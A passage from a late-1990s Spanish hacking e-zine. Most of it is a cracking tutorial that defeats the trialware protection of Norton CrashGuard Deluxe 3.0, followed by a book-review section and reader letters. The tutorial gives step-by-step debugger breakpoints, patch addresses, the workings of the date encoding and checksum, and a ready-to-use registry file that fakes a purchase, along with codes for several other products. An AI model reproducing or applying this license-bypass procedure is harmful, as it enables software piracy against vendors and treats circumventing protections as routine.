  1293.   cgmain.exe: boton derecho sobre el icono de la N y el escudo y exit.
  1294.   Abrimos el loader del Softice y seleccionamos Norton CrashGuard\cgmain.exe
  1295.   y ponemos un bpx 40DC40 y lanzamos el programa. Aparecemos en el Softice,
  1296.   pulsamos F10 y vemos que ha sido llamada desde :40DD63. Cerramos el
  1297.   cgmain.exe otra vez, ponemos el softice un bpx 40DD63 y lanzamos el
  1298.   programa y prestamos atencion a ebx que es el que contiene la fecha
  1299.   encriptada.
  1300.  
  1301.         La llamada a call 0040DC40 simplemente realiza la siguiente
  1302.   comprobacion
  1303.  
  1304.   :0040DC56  cmp edx, eax; compara fechaAnterior,fechaActual
  1305.   :0040DC58  ja 0040DC64; Salta si eres un  mal chico.
  1306.  
  1307.         fechaAnterior es la fecha encriptada el la que se arranca por ultima
  1308.   vez el programa, fechaActual es la fecha encriptada obtenida de :0041E200.
  1309.   Es una simple comprobacion para ver si hemos echado para atras el reloj.
  1310.  
  1311.   La comprobacion 
  1312.  
  1313.   cmp dword ptr [ebx+00000284], edi; Analogamente cmp dword ptr
  1314.   [edi+00000284], ebx
  1315.   ja 0040DACE; Analogamente ja 0040DDE4
  1316.  
  1317.         Comprueba fechaCaducidad > fechaActual Si es mayor estamos en el
  1318.   periodo de prueba.
  1319.  
  1320.   LA FECHA DE CADUCIDAD
  1321.  
  1322.         La pregunta es, ¿de donde se guarda la fecha de caducidad encriptada?.
  1323.   Poniendo un bpr ebx+00000284 ebx+00000284+5 descubrimos que la fecha de
  1324.   encriptacion se guarda en el registro del sistema y es recuperada por la
  1325.   llamada a la funcion :40BD89 RegqueryValueEXA. En concreto, se guarda en
  1326.   HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\write
  1327.  
  1328.         En mi caso, el valor de write es:
  1329.  
  1330.        01 02 03 04 05 06 07 08
  1331.  
  1332.   01   00 00 00 05 B7 FF FF F8
  1333.   02   00 00 00 00 00 00 10 00
  1334.   03   08 00 00 00 08 00 00 00
  1335.   04   00 00 00 06 B3 36 71 A1
  1336.   05   FB 0F 81 A5 20 80 00 06
  1337.   06   B7 9F A9 A0 00 00 00 00
  1338.   07   00 00 00 06 B3 36 71 A0
  1339.   08   C3 28 00 00 18 00 00 00
  1340.   09   00 00 00 00 00
  1341.  
  1342.         La fecha de caducidad esta en write(5,7) hasta write(6,5) ambos
  1343.   inclusive. Lo curioso, es que la fecha esta codificada, por ejemplo si la
  1344.   fecha de caducidad es 0034F5F3D6 se guarda en write 0006B79FA9A000. La
  1345.   rutina de encriptacion esta en :40C0D6 y se basa en la operacion or 
  1346.  
  1347.   :0040C0D6 8A18                    mov bl, byte ptr [eax]
  1348.   :0040C0D8 8A11                    mov dl, byte ptr [ecx]
  1349.   :0040C0DA C0E305                  shl bl, 05
  1350.   :0040C0DD 48                      dec eax
  1351.   :0040C0DE C0EA03                  shr dl, 03
  1352.   :0040C0E1 49                      dec ecx
  1353.   :0040C0E2 0ADA                    or bl, dl
  1354.   :0040C0E4 4E                      dec esi
  1355.   :0040C0E5 885101                  mov byte ptr [ecx+01], dl
  1356.   :0040C0E8 885901                  mov byte ptr [ecx+01], bl
  1357.  
  1358.         He creado dos programas DECODE que decodifica el valor de write y
  1359.   CODE que codifica un valor de fecha para introducirlo en write.
  1360.  
  1361.   CHECKSUMS PARAINOCOS
  1362.  
  1363.         Los puntos de ataque son claros
  1364.  
  1365.   1.- Parchear las comprobaciones en el ejecutable.
  1366.   2.- Introducir una fecha caducidad en el año 30000.
  1367.  
  1368.         1.- Si parcheamos el programa, se produce un error tan gordo que se
  1369.   casca windows. Esto se puede deber a que hemos crackeado mal obien exite un
  1370.   checksum. Para salir de dudas, basta con modificar alguna cadena de
  1371.   caracteres del ejecutable original Por ejemplo "not be run in DOS mode" lo
  1372.   pasamos a "not be RUN in DOS mode", si se casca es que hay un checksum,
  1373.   como en este caso.
  1374.  
  1375.         Un checksum es una comprobacion para ver si el ejecutable se ha
  1376.   modificado, normalmente se realiza sumando (XOR) los bytes del ejecutable y
  1377.   guardando este valor algun sitio (ejecutable, registro del sistema). El
  1378.   programa al arrancar suma (XOR) los bytes del ejecutable actual y comprueba
  1379.   la suma con el valor que tenia guardado. Si hay algun problema es que un
  1380.   virus o un cracker ha modificado el programa y esto nunca es bueno para el
  1381.   programador.
  1382.  
  1383.         En el caso del Norton CrashGuard Deluxe 3.0, el checksum se realiza
  1384.   de otra forma. Os acordais del fichero cgmaitky.dll, si hombre ese que nos
  1385.   parecia tan sospechoso. Pos bien, guarda todos los bytes del cgmain.exe
  1386.   encriptados (de ahi que tuvieran un tamaño tan parecido ambos ficheros). La
  1387.   rutina de checksum, simplemente consiste en coger de 16 en 16 los bytes del
  1388.   cgmain.exe encriptarlos y ver si son iguales a 16 bytes del fichero
  1389.   cgmaitky.dll. Si existe alguna diferencia se produce un error de proteccion
  1390.   general y se casca todo.
  1391.  
  1392.         Para complicarlo todo, las rutinas de comprobacion (ver si los 16
  1393.   bytes del ejecutable son iguales a los 16 bytes del cgmaitky.dll) no estan
  1394.   metidas en un bucle, sino que estan a lo extenso. Es decir, hay una rutina
  1395.   de comprobacion para los 16 primeros bytes, otra disinta para los 16
  1396.   siguientes. Si queremos parchear el checksum, habra que modificar unas 30
  1397.   comprobaciones. Es curioso, pero existe un flag que desactiva la llamada al
  1398.   checksum :0040862D jne 00408695 si obligamos a saltar siempre, evitamos el
  1399.   checksum. PERO, ¿POR QUE EXISTE UN FLAG PARA EVITAR EL CHECKSUM?, ¿es que
  1400.   el programa cgmain.exe va a modificarse? Como veremos mas tarde, asi
  1401.   ocurrira.
  1402.  
  1403.         2.- Con el programa NORTON se crea la fecha de caducidad que queremos,
  1404.   con el programa CODE se encripta y ya solo hay que introducir el resultado
  1405.   en HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\write en las posiciones
  1406.   write(5,7),write(6,5)
  1407.  
  1408.   CHECKSUMS HASTA EN LA SOPA
  1409.  
  1410.         Cuando la fecha de caducidad ha vencido, el programa deja de
  1411.   funcionar parcialmente, si analizamos el porque descubrimos que el byte
  1412.   [esi+00000568] controla todo el meollo. En concreto,
  1413.  
  1414.   Si [esi+00000568] = 02 You cannot Run this Application
  1415.   Si [esi+00000568] = 20 Your computer application source has changed
  1416.   Si [esi+00000568] = 08 Your free trial period is over
  1417.   Si [esi+00000568] = 04 OK
  1418.  
  1419.         Pero, ¿como se rellena este byte?. Siguiendo la pista hacia atras
  1420.   descubrimos que se carga a partir de
  1421.   HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\open
  1422.  
  1423.      00 01 02 03 04 05 06 07
  1424.  
  1425.   1  00 00 00 00 30 00 00 00
  1426.   2  00 00 00 00 00 00 10 00
  1427.   3  08 08 00 00 20 00 00 00
  1428.   4  00 00 00 00 00 00 00 00
  1429.  
  1430.         En concreto de write(3,4). Hay que tener cuidado por que esta
  1431.   encriptado, asi que hay que utilizar el programa DECODE. Osea , si en
  1432.   write(3,4)=20 indica que al desencriptarlo [esi+00000568]=4. Si
  1433.   write(3,4)=40 la fecha de caducidad ha vencido.
  1434.  
  1435.         Si ha pasado la fecha de caducidad y asignamos write(3,4)=20, el
  1436.   programa replica diciendo que hemos trampeado los recursos. ¿QUE PASA AQUI?.
  1437.  
  1438.         Mu facil, HAY UN CHECKSUM en la seccion
  1439.   HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\open. Estos es paranoico, un
  1440.   checksum en el propio registro del sistema. En concreto, el checksum esta
  1441.   en write(1,4). Se deja como ejercicio localizar y destruir este checksum.
  1442.  
  1443.   LA MISMA PROTECCION EN TODOS SITIOS
  1444.  
  1445.         Aunque parezca increible, los ficheros CGDeluxe.exe y CheckUp.exe
  1446.   tienen exactamente la misma proteccion que cgmain.exe y ademas en los
  1447.   mismos offset, osea en las mismas direcciones de memoria. Esto es
  1448.   extremadamente extraño, asi que adoptaremos otra via de ataque.
  1449.  
  1450.   LA APROXIMACION FACIL
  1451.  
  1452.   Veamos lo que tenemos:
  1453.  
  1454.         - Unos ficheros extraños asociados a los ficheros importantes.
  1455.   Sabemos la funcion de uno de ellos los *tky.dll sirven de checksum, pero y
  1456.   el resto para que sirven?
  1457.  
  1458.          - Un flag que desactiva el checksum del ejecutable.
  1459.  
  1460.         - Unos misteriosos fichero ejecutables con el logo RS que dicen que
  1461.   tiene que prepara el Sotware.
  1462.  
  1463.          Nos centraremos en los ejecutables con los logos RS.
  1464.  
  1465.   REUNIENDO LAS PIEZAS
  1466.  
  1467.         Para cada utilidad , p.e. CGDeluxe.EXE existe un fichero,
  1468.   CGDeltky.dll, que realiza funciones de checksum (como ya vimos), una
  1469.   libreria de un gran tamaño , CGDeluxe.dl_ ,y un ejecutable CGDelpop.exe que
  1470.   "prepara el Software".
  1471.  
  1472.         No hay que ser un lince para darse cuenta que CGDelpop.exe "prepara"
  1473.   de alguna forma CGDeluxe.dl_  para aportar toda la funcionalidad a
  1474.   CGDeluxe.EXE. Esta "preparacion" solo se realiza cuando estamos registrados.
  1475.  
  1476.         Por tanto, se parte de un archivo ejecutable de un tamaño inferior a
  1477.   la version completa del programa. Una vez realizado el proceso de compra se
  1478.   activa otro ejecutable que convierte la version de prueba en version
  1479.   completa .
  1480.  
  1481.         Todas las demas utilidades que acompañan al Norton CrashGuard Deluxe
  1482.   tienen el mismo proceso (CheckUP.exe ->Checkpop.exe, Checkup.dl_,
  1483.   Checktky.dll) (Cgmaipop.exe ->cgmain.exe, cgmaitky.dll)
  1484.  
  1485.   LA COMPRA VIRTUAL 
  1486.  
  1487.         Nos centraremos en el asistente (CGDeluxe.EXE) de compra que vimos en
  1488.   nuestra "Primera Aproximacion" : Doble click en el escudo con la N que hay
  1489.   en el escritorio y al pulsar el boton Buy Now (comprar ahora) aparece el
  1490.   asistente de compra.
  1491.  
  1492.         Este sera nuestro punto de entrada. Si pensamos un poco observaremos
  1493.   que la aplicacion que lanza el proceso de compra debe saber si la compra ha
  1494.   tenido exito o no. Por tanto, sera por aqui por donde centremos nuestros
  1495.   esfuerzos. Ademas debe de anunciar de alguna forma al resto de utilidades
  1496.   que la compra ha tenido exito para que ellas tambien se "preparen"
  1497.   Analizaremos el ejecutable CGDeluxe.exe (que el que se lanza al pulsar el
  1498.   icono del escritorio) y observaremos como "compra".
  1499.  
  1500.         Nada mejor que usar un desensamblador para investigar el programa
  1501.   CGDeluxe.exe (224 Kb). Una vez aparece el listado observamos que hace uso
  1502.   de la libreria comercial RSAGNT32.DLL (encargada de realizar la compra
  1503.   virtual) y que existen un referencias a funciones tales como SAInitialize,
  1504.   startSalesAgent. Estas van a ser nuestras funciones de aproximacion.
  1505.  
  1506.         Pulsamos en el boton de Imported Functions (Imp Fn) y hacemos doble
  1507.   click en la linea de rsagnt32.startSalesAgent.
  1508.  
  1509.         Aparecera en el listado lo siguiente:
  1510.  
  1511.   * Reference To: rsagnt32.startSalesAgent, Ord:000Eh
  1512.  
  1513.   :00407834 E807F30000            Call 00416B40   ▀ Llamada al asistente
  1514.   :00407839 83C408                add esp, 00000008
  1515.   :0040783C 66833D0425430000      cmp word ptr [00432504], 0000
  1516.   :00407844 742B                  je 00407871
  1517.  
  1518.         Echamos un vistazo hacia arriba y hacia abajo del listado y vemos que
  1519.   nos encontramos en un bloque de codigo que se encarga de cargar, iniciar,
  1520.   ejecutar, terminar el asistente de compra. Buscamos donde puede empezar el
  1521.   bloque. Y un poco mas arriba encontramos:
  1522.  
  1523.   ///////////// INICIO DE BLOQUE ////////////////
  1524.   * Referenced by a CALL at Address:
  1525.   :00406752                       <- desde aqui es llamado el bloque del
  1526.                                      asistente de compra
  1527.  
  1528.   :004077B0 A1B07B4300            mov eax, dword ptr [00437BB0]
  1529.   :004077B5 53                    push ebx
  1530.   :                               :
  1531.   :                               :
  1532.   * Reference To: rsagnt32.startSalesAgent, Ord:000Eh   <- Aqui hemos
  1533.                                                            comenzado
  1534.                                                            la busqueda
  1535.  
  1536.   :00407834 E807F30000            Call 00416B40         <- Llamada al
  1537.                                                            asistente
  1538.   :00407839 83C408                add esp, 00000008
  1539.   :0040783C 66833D0425430000      cmp word ptr [00432504], 0000
  1540.   :00407844 742B                  je 00407871
  1541.   :00407846 BFE0A54300            mov edi, 0043A5E0
  1542.   :                               :
  1543.   :                               :
  1544.   :00407878 5F                    pop edi
  1545.   :00407879 5E                    pop esi
  1546.   :0040787A 5B                    pop ebx
  1547.   :0040787B C3                    ret
  1548.  
  1549.   ///////////// FIN DE BLOQUE ////////////////
  1550.  
  1551.         Ahora una vez que conocemos desde donde hemos llamado al bloque,
  1552.   usamos el menu Goto -> Goto Code Location y escribimos el desplazamiento
  1553.   406752. Aqui observamos lo siguiente:
  1554.  
  1555.   * Possible Reference to String Resource ID=00001: "Turnkexe"
  1556.  
  1557.   :00406748 C705C826430001000000  mov dword ptr [004326C8], 00000001
  1558.   :00406752 E859100000                    call 004077B0   <- Entrada en el
  1559.                                                              bloque anterior
  1560.   :00406757 66392D04254300                cmp word ptr [00432504], bp
  1561.   :0040675E 0F84F4010000                  je 00406958
  1562.   :00406764 BF34254300                    mov edi, 00432534
  1563.  
  1564.         Ummmma. Aqui ya tenemos una bonita direccion de memoria (variable
  1565.   global) para usar con Softice.Pero antes añadamos la libreria RSAGNT32.DLL.
  1566.   al la lista de dll que sabe manejar el Softice.
  1567.  
  1568.         Abrimos el Symbol Loader de Softice y en el menu Edit -> Softice
  1569.   Initialization Settings -> Exports añadimos RSAGNT32.DLL. Abrimos el Symbol
  1570.   Loader y cargamos (Load) el programa CGDeluxe.exe. Ya en el SoftIce:
  1571.  
  1572.   Bpx 406752
  1573.   Bpx startSalesAgent
  1574.  
  1575.         Pulsamos F5 y cuando aparezca la ventana de  "Welcome to Symantec
  1576.   Trialware" pulsamos sobre el boton "Buy Now". Aparecer en el Softice en el
  1577.   primer breakpoint Bpx 406752
  1578.  
  1579.   Seguimos ejecutando, paramos en la funcion startSalesAgent
  1580.  
  1581.   cs:00407834 E807F30000          Call rsagnt32!startSalesAgent   <- Asistente
  1582.                                                                      de compra
  1583.   cs:00407839 83C408              add esp, 00000008
  1584.   cs:0040783C 66833D0425430000    cmp word ptr [00432504], 0000 
  1585.   cs:00407844 742B                je 00407871             <- si salta, has
  1586.                                                              comprado
  1587.  
  1588.         Nopeamos el asistente de compra. Esto es, sustituimos la llamada por
  1589.   instrucciones inonfesivas. En : 00407834  90 90 90 90 90
  1590.  
  1591.         Si estudiamos je 00407871 y hacemos que no vaya a la direccion 407871
  1592.   aparece una ventana contandonos que se ha grabado un archivo llamado
  1593.   Rslicens. txt pero esto no hace que se active el proceso de compra, este
  1594.   nos es el camino.
  1595.  
  1596.         Otra comparacion interesante se encuentra despues de la rutina de
  1597.   entrada al bloque
  1598.  
  1599.   cs:00406752 E859100000        call 004077B0    <- Bloque anterior
  1600.   cs:00406757 66392D04254300    cmp [00432504], bp  <- Comparacion Interesante
  1601.   cs:0040675E 0F84F4010000      je 00406958
  1602.   cs:00406764 BF34254300        mov edi, 00432534
  1603.  
  1604.         Cuando nos encontremos sobre la  direccion cs:0040675E cambiamos el
  1605.   flag de cero que estara activada (Z) y la colocamos a desactivada (z).
  1606.   Ahora el programa seguira en cs:00406764. Pulsemos F5 y veamos que ocurre.
  1607.  
  1608.         Ha aparecido una ventana que nos dice que esperemos mientras nuestro
  1609.   programa esta siendo preparado (Please wait while your software is being
  1610.   prepared). Al fin, se "PREPARA EL SOFTWARE"
  1611.  
  1612.         Nota: Si el proceso anterior se repite muchas veces conviene que
  1613.   cerremos todos los programas que tengamos activo e incluso el mismo Norton
  1614.   Crashguard que tengamos en la barra de tareas.
  1615.  
  1616.         Una vez completado este proceso habremos comprado virtualmente el
  1617.   Norton crashguard Deluxe.
  1618.  
  1619.         Observaremos que han desaparecido los ficheros CGDeluxe.dl_ y
  1620.   CGDeltky.dll y han aparecido dos archivos de licencia RSLICENS.txt y
  1621.   LICENSE.xxxxxx (numeros de licencia) Este proceso realizado en tiempo real
  1622.   con el Softice no trae ningun problema pero a la hora de hacer los parches
  1623.   no encontraremos problemas con los checksum .Pero..TRANQUILOS QUE TODO
  1624.   TIENE SOLUCION.
  1625.  
  1626.   MODIFICANDO EL REGISTRO
  1627.  
  1628.         Usaremos una herramienta muy util para los crackers el programa
  1629.   Regmonitor (si no lo tienes consiguelo). Observamos unas variables que lee
  1630.   el programa (no registrado) al principio y tenemos:
  1631.  
  1632.   HKCR\ultxfile\Format\MSHAEZDC\write  /* Esta nos suena */
  1633.   HKCR\ultxfile\Format\MSHAEZDC\xlate
  1634.   HKCR\ultxfile\Format\MSHAEZDC\open /* Esta nos suena*/
  1635.  
  1636.         Bien, basta comparar los valores antes y despues de "preparar" el
  1637.   software, para darse cuenta que la unica modificacion la realiza en open.
  1638.   Cuando esta registrado su valor es:
  1639.  
  1640.   HKEY_CLASSES_ROOT \ultxfile\Format\MSHAEZDC\open
  1641.   00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 10 00
  1642.   08 08 00 00 10 00 00 00 - 00 00 00 00 00 00 00 00
  1643.  
  1644.         Esta es la forma en que se comunica al resto de utilidades que la
  1645.   compra ya ha tenido exito. Y YA ESTA, basta con introducir este valor en el
  1646.   registro para que quede registrado el Norton CrashGuard Deluxe 3.0
  1647.  
  1648.         MSHAEZDC corresponde al programa en cuestion a comprar. Usando el
  1649.   regmonitor vemos que clave busca el programa a desproteger y anotamos el
  1650.   codigo (MSHAEZDC).
  1651.  
  1652.         Esta tactica se ha probado con exito con las siguientes aplicaciones
  1653.   protegidas por la compañia Release Software Corporation : Norton utilities,
  1654.   Norton Uninstaller, Norton Antivirus, Xing MPEG Encoder,
  1655.  
  1656.         Creando un archivo de registro ya tenemos hecho un crack no
  1657.   destructivo ya que no modifica ningun ejecutable.
  1658.  
  1659. ----------------------------------- Cortar por aqui --------------------------
  1660. REGEDIT4
  1661. ; (c) ESTADO+PORCINO 1998
  1662. ; Modificacion de registro para Norton Crash Guard Deluxe
  1663. ; Mr.Red & otras hierbas
  1664. ;
  1665. [HKEY_CLASSES_ROOT\ultxfile\Format\MSHAEZDC]
  1666. "open"=hex:00,00,00,00,00,0
  1667. ffb
  1668. 0,00,00,00,00,00,00,00,00,10,00,08,08,00,00,10,00
  1669. ,00,00,00,00,00,00,00,00,00,00
  1670.  
  1671. ----------------------------------- Cortar por aqui --------------------------
  1672.  
  1673.         Para los demas programas que usan esta proteccion tenemos:
  1674.  
  1675.   Xing MPEG Encoder       codigo -> MSHVEMAV
  1676.   Norton Utilities        codigo -> MSHVEM0E
  1677.   Norton Unisntaller      codigo -> MSHW2EHL
  1678.  
  1679.         Bueno ha sido largo pero ha merecido la pena.
  1680.  
  1681.  
  1682.         MORALEJA: Si quieres poner una puerta, procura que no sea de papel.
  1683.  
  1684.         Es el colmo de la incompetencia. Confias la venta de tu producto a un
  1685.   empresa que proporciona una proteccion ridicula que no vende tu producto si
  1686.   no que practicamente lo regala. Por que no invertir la millonada que
  1687.   Symantec habra pagado a Release Software Corporation encontrar a unos
  1688.   buenos programadores en ensamblador que hicieran una proteccion decente.
  1689.   Ademas, esta compañaa protege y vende productos de mas empresas a parte de
  1690.   Symantec. Basta pasarse por su web http://www.releasesoft.com y comprobar
  1691.   lo orgullosos que estan de sus clientes. Realmente, no creo que esta
  1692.   compañia dure mucho.
  1693.  
  1694.         La importancia de este articulo radica en que se ha conseguido
  1695.   solventar con exito la proteccion de una casa de Software dedicada a
  1696.   proteger y vender. Quedan a nuestros pies cientos de programas, con una
  1697.   proteccion de papel, gracias a la incompetencia de una avariciosa compañia.
  1698.   Mejor seria que diera los programas gratis, y de dejara de hacer el
  1699.   ridiculo.
  1700.  
  1701.         Esperamos vuestras opiniones, sugerencias y ensayos en
  1702.   estadoporcino@hotmail.com Recordad bebed de la fuente, buscad a +ORC en la
  1703.   red.
  1704.  
  1705.   Mr_PinK & WKT ( WHISKEY KON TEKILA )
  1706.   http://wkt.home.ml.org
  1707.   http://wkt.mypage.org
  1708.  
  1709. <────────────────────────────────────────────────────────────────────────────>
  1710. ██████████████████████████████████████████████████████████████████████████████
  1711. <────────────────────────────────────────────────────────────────────────────>
  1712.  
  1713.                       /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
  1714.                      │     Un poco de cultura: Libros     │
  1715.                       \----------------------------------/
  1716.  
  1717.  
  1718.         Bien, en primer lugar, esta va a ser, digamos, la nueva seccion del 
  1719.   e-zine. Aqui, a partir de ahora y en adelante a los siguientes e-zines,
  1720.   comentaremos distintos titulos de libros relacionados con el tema, y por 
  1721.   supuesto donde podreis encontrarlos y su precio (si es q se sabe :o).
  1722.  
  1723.       Dicho esto, vamos a empezar:
  1724.  
  1725.   - Cyberpunk, outlaws and hackers on the computer frontier. Katie Hafner and
  1726.     John Markoff. Simon & Shuster, New York 1995.
  1727.  
  1728.     Libro de lectura obligada, engloba todos los casos mas conocidos sobre el 
  1729.   underground, desde Kevin Mitnick hasta el Hacker de Hannover. De momento 
  1730.   este libro solo lo he encontrado en ingles :o(, pero bueno, podeis buscarlo
  1731.   en espa±ol tambien, mirar por su ISBN :0-684-81862-0. Unas 1.500 a 2.000 pts
  1732.  
  1733.   - Hackers: Heroes of the computer revolution. Steven Levy. Dell Books, New 
  1734.     York, 1994.
  1735.  
  1736.     Otro de los grandes libros sobre el tema. Steven Levy es un autor expe-
  1737.   rimentado sobre el tema de los ordenadores, este es su tercer libro. Tambi-
  1738.   en en ingles, pero como ya dije antes, puedes buscarlo por su ISBN :0-385-
  1739.   31210-5. 1.500 pelas.
  1740.  
  1741.   - Hacker Crackdown, The: Law and Disorder on the Electronic Frontier. Bruce
  1742.     Sterling. Bantman Books, 1993.
  1743.  
  1744.     Uno de los libros mas famosos sobre el mundo de los hackers. En este
  1745.   libro, el autor examina el pasado, presente y futuro del underground, desde
  1746.   sus principios, pasando por MoD y LoD hasta, de nuevo, Mitnick. Otro mas en
  1747.   ingles. Su ISBN: 0-553-56370-X.
  1748.  
  1749.   - Huevo del Cuco, El. Clifford Stoll, 1990.
  1750.  
  1751.     Que decir de uno de los libros mas famosos sobre el underground. Aqui tie-
  1752.   nes toda la historia del conocido Hacker de Hannover, toda una autentica
  1753.   historia. ISBN: 0-671-72688-9. Sobre las 2.000 pelas.
  1754.  
  1755.   - Maximun Security: A Hacker's Guide to protecting your internet site and
  1756.     network. Anonymous, SAMS Net, Indianapolis, 1997.
  1757.  
  1758.     Este es uno de los libros "tecnicos" mas famosos y utiles q conozco. En es-
  1759.   te libro encontraras todo lo necesario para aprender sobre seguridad, desde
  1760.   el usuario mas principiante hasta el administrador de un sistema, aqui tie-
  1761.   nes absolutamente todas las respuestas a tus preguntas. Libro escrito por
  1762.   un hacker ya experimentado. El libro incluye el ultimo manifiesto escrito
  1763.   por The Mentor, y una de las mejores citas sobre el autor que he leido hasta
  1764.   ahora. La cita dice asi: "El autor de este libro vive felizmente en el sur
  1765.   de California, con un Sun SPARCStation, un IBM RS-6000, dos Pentium, varios
  1766.   MicroVax, y su mujer" :o), bueno, dejemonos de coñas, aqui esta su ISBN:
  1767.   1-57521-268-4. Altamente recomendado :o). Un poco carillo, entre 7.500 y
  1768.   10.000 ptas. depende el sitio donde lo compres.
  1769.  
  1770.   - Masters of Deception: The gang that ruled cyberspace. Michelle Stalla &
  1771.     Josua Quitter, Harper Collins, 1995.
  1772.  
  1773.     Libro imprescindible si quieres conocer la autentica historia sobre los MoD.
  1774.   Este libro se basa en los pasos seguidos por Phiber Optik (aka Mark Abene) y
  1775.   sobre sus andanzas por Legion of Doom, 2600 y la fundacion de Masters of
  1776.   Deception. Muy Bueno y entretenido. ISBN: 0-060-92694-5. 1.500 ptas.
  1777.  
  1778.   - Mundo Digital, Un. Nicholas Negroponte. RandomHouse, 1995.
  1779.  
  1780.     Un libro muy entretenido, escrito por un gran autor y gran estudioso de los
  1781.   ordenadores y a lo que de tecnologia se refiere. Este libro lo hay en espa-
  1782.   ñol, lo que no se es la editorial fijo, asin que vuelve a buscar por su ISBN
  1783.   0-679-43919-6. Sobre 2.000 pelas.
  1784.  
  1785.   - Takedown.Tsutomu Shimomura, John Markoff. Hyperion, 1996.
  1786.  
  1787.     Otro de los grandes libros sobre los grandes del Hack, en este caso se
  1788.   cuenta como se capturo a Kevin Mitnick. Este libro esta escrito por el autor
  1789.   de su captura, muy entretenido. ISBN: 0-786-88913-6. Sobre las 2.000 pelas.
  1790.  
  1791.   - UNIX in a Nutshell: A Desktop Quick Reference for Solaris V and 2.0.
  1792.     Daniel Gilly. O'Reilly & Associates, 1992.
  1793.  
  1794.     Trannnnnnnnquis, aunque parezca que el librito ta un poco anticuado, no pasa
  1795.   na, acaba de salir la segunda edicion actualizada para el SVR4. Uno de los
  1796.   libros mas famosos para empezar a conocer este sistema operativo. 2.000 ptas.
  1797.   ISBN: 1-585-92001-5
  1798.  
  1799.   - UNIX Unleashed. Sams Development Team. SAMS Publishing, Indianapolis 1994.
  1800.  
  1801.     Acojonante, es la unica palabra que se me ocurre para describir este pedazo
  1802.   de libro. Aqui encontraras todo lo que necesites saber del SVR4. Escrito por
  1803.   gurus del UNIX. ISBN: 0-672-30402-3. Sobre unas 7.500 a 8.000 ptas.
  1804.  
  1805.  
  1806.   Bueno, de momento esto es todo lo que os puedo ofrecer de libros, pero no os
  1807.   preocupeis, el proximo e-zine, mas :o).
  1808.  
  1809.   mac_crack@usa.net
  1810.  
  1811. <────────────────────────────────────────────────────────────────────────────>
  1812. ██████████████████████████████████████████████████████████████████████████████
  1813. <────────────────────────────────────────────────────────────────────────────>
  1814.  
  1815.                              ┌─────────────────┐
  1816.                             <  EL LECTOR OPINA  >
  1817.                              └─────────────────┘
  1818.  
  1819.         Otra vez ya estamos con vuestra seccion, pero os pedimos que penseis
  1820.   claramente lo que nos escribiis, ya que sige habiendo mucho desaprensivo
  1821.   que solo quiere entrar en computadoras ajenas y similares, esto es una
  1822.   tonteria, por lo que no hace falta que escribais }:-) Al igual que tampoco
  1823.   hace falta que escribas un mail solicitando que os demos clases de hack,
  1824.   menuda tonteria. Okis?
  1825.  
  1826.         Por otro lado esta seccion esta mejorando, ya que por fin los lectores
  1827.   se empiezan a contestar entre ellos, y esto es lo que precisamente
  1828.   pretendiamos con esta seccion y nos alegra mucho ;-) y ya basta de rollos
  1829.   y que comienze el mail de nuestros fantasticos lectores.
  1830.                                
  1831. <────────────────────────────────────────────────────────────────────────────>
  1832.        
  1833.   From:  PoP <popup@xxxxxxxxxxxxxx>      
  1834.   To:  jjf_team@usa.net  
  1835.   Subject:  novato...... en IRC soy ^PoP^ :)  
  1836.  
  1837.   Hace un mes, mas o menos, me pasaron vuestra web, y me parecio
  1838.   bueniiiiiiisima. Estoy leyendo todos los txt, incluidos los e-zines(que es
  1839.   muy buena..... sera pq es la primera ke leo :), y ademas es baratita...
  1840.   jeje, pero de muchas cosas nomentero...
  1841.  
  1842.   Es por esto ke os "maileo" para sugerir ke pongais en el e-zine o en
  1843.   kualkier otro sitio(kreeme ke lo buskare) un diccionario en el ke vengan
  1844.   palabras teknikas ya ke eso ayudaria mucho.
  1845.   Estoy komo loko por hacer todo eso de lo ke hablais en el e-zine(mi novia
  1846.   dice ke kiero mas a mi PC ke a ella  :)  ) pero veo ke es totalmente
  1847.   necesario tener al menos un linux, controlar el lenguaje C y sobre todo
  1848.   saber komo se kompila. Bueno el kaso es ke me veo inkapaz de acceder a
  1849.   internet por otro S.O. ke no sea el Win95 (o NT ke es lo mismo a mi
  1850.   parecer), ya ke intente instalar linux (la version s.u.S.e 5.0 y no me dio
  1851.   muy buen resultad( a parte de no entender ni papa) y por eso os pido
  1852.   ayuda...
  1853.   Me gustaria (si no es mucho pedir) ke me sugirierais ke version de linux
  1854.   instalar(tengo la suse 5.1 y la red hat 5.0, aunke kompraria otra si hace
  1855.   falta) para poder iniciarme (y algun tipo de informacion sobre los comandos
  1856.   de linux). Ya he preguntado por ahi y me ha dicho ke pruebe kon la
  1857.   SlackWare... .  Pero sobre todo un libro para aprender lenguaje C y saber
  1858.   kompilar, para pardillos komo yo ke empiezan del zero_absoluto( en lo ke a
  1859.   lenguaje C se refiere).
  1860.   Enga, no os doy mas la tabarra.... solo felicitaros por la pag y por el
  1861.   e-zine (sois mu wuenos :) ) y seguid asi! Accedeis a ayudar y es dificil
  1862.   enkontrar ayuda sobre hack para los novatos komo yo ke kieren llegar ha ser
  1863.   komo vusotros... y olvidar el w95 de una puñetera vez!
  1864.             Espero vuestro mail y.........     Muxxxxxxxas   Gracias! 
  1865.  
  1866.      Atentamente....    Jose Antonio Lopez (Murcia) 
  1867.  
  1868.   <------>
  1869.  
  1870.   [ Thx, Hombre lo referente a las versiones linux eso depende un poco de
  1871.    tus gustos, por ejemplo:
  1872.  
  1873.     - Red Hat or SuSe = Facil de instalar y mantener.
  1874.     - Slackware = Muy buena.
  1875.     - Debian = Enfocada a los programadores.
  1876.  
  1877.     Nuestro consejo es que empiezes con RH 5.0 o SuSe que son faciles y
  1878.     despues pruebes con Slackware o Debian. Como dices bien en tu mail es
  1879.     aconsejable que pilles algun libro sobre Linux y C. ]
  1880.  
  1881. <────────────────────────────────────────────────────────────────────────────>
  1882.  
  1883.   Date: Fri, 24 Apr 1998 19:52:41 -0700 (PDT)
  1884.   From: hardbody@xxxxxxxxxxxxxx
  1885.   Subject: help
  1886.  
  1887.   Señor Conde Vampiro
  1888.  
  1889.   Por favor, ayudeme, yo lo que mas quiero en la vida es ser hacker, me
  1890.   fascina la idea de entrar a otro computador sin que este se de cuenta,
  1891.   estoy en segundo semestre de Ingenieria de Sistemas y tengo 17 años.
  1892.  
